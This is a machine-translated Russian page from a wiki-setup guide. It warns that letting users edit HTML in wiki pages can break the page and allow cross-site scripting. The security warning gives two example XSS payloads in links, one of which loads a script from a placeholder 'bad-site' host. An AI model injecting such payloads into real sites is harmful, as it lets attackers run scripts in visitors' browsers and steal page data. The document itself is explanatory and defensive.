Первый также неудобен для пользователя, учитывая текущее состояние редактирования в браузере.

Дата: 2025-04-30; Просмотры: 3

Оценка:

0.00 из 5.00 — оценок

Скачиваний: 0

Скачать

окно. Тем не менее, вы найдете ряд клонов вики, которые позволяют это, и группу

пользователи, которые совершенно счастливы вручную редактировать HTML-теги. Согласитесь, это не сложно

чтобы научиться использовать основные теги, так что этот вариант отлично подходит для контролируемого пользователя

среда.

Совет 6.32. Разрешение редактирования HTML-тегов может сделать страницу невидимой для просмотра

Разрешение пользователям редактировать HTML-теги в содержимом вики-страницы влечет за собой очень

потенциальная проблема: неправильно размещенная или отредактированная HTML-разметка может сделать страницу

буквально недоступны для просмотра в некоторых или во всех веб-браузерах, в зависимости от серьезности

Ошибка. Полная свобода формата ввода имеет цену, которая может доказать

неприемлемо.

Предупреждение системы безопасности

Дополнительный аспект безопасности, позволяющий включать теги HTML в редактируемые пользователем

text заключается в том, что это может позволить злоумышленникам взломать теги для перенаправления клиента браузера посетителя.

Это связано с тем, что активные части гиперссылки URL обычно

не видны посетителю. Рассмотрим эти примеры (предполагающие, что клиент будет

запускать скрипты):

<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT>

вредоносный код</SCRIPT>">Нажмите здесь</A>

<A HREF="http://example.com/comment.cgi?mycomment=<SCRIPT SRC=

1

http://bad-site/badfile'></SCRIPT>">Нажмите здесь</A>

В любом случае пользователь увидит только «Нажмите здесь» в качестве привязки ссылки, хотя это может

легко также быть невинно выглядящим URL-адресом, отличным от активной ссылки.

Первый пример запускает вставленный код скрипта в любом контексте, установленном пользователем.

1

42

НАСТРОЙКА ВАШЕЙ ВИКИ

с сервером CGI, который может быть "безопасным". Второй тянет доп.

материал с ненадежного сайта.

Поскольку вредоносные скрипты с другого сайта выполняются в контексте,

исходит с целевого сайта, злоумышленник имеет полный доступ к

полученный документ и, в зависимости от технологии, выбранной злоумышленником, может

выполнять всевозможные нежелательные операции, такие как отправка конфиденциальных данных, содержащихся

на странице обратно на вредоносный сайт. Хакер также может обмануть серверную программу.

выполнение в неподходящем контексте безопасности с неподходящими привилегиями.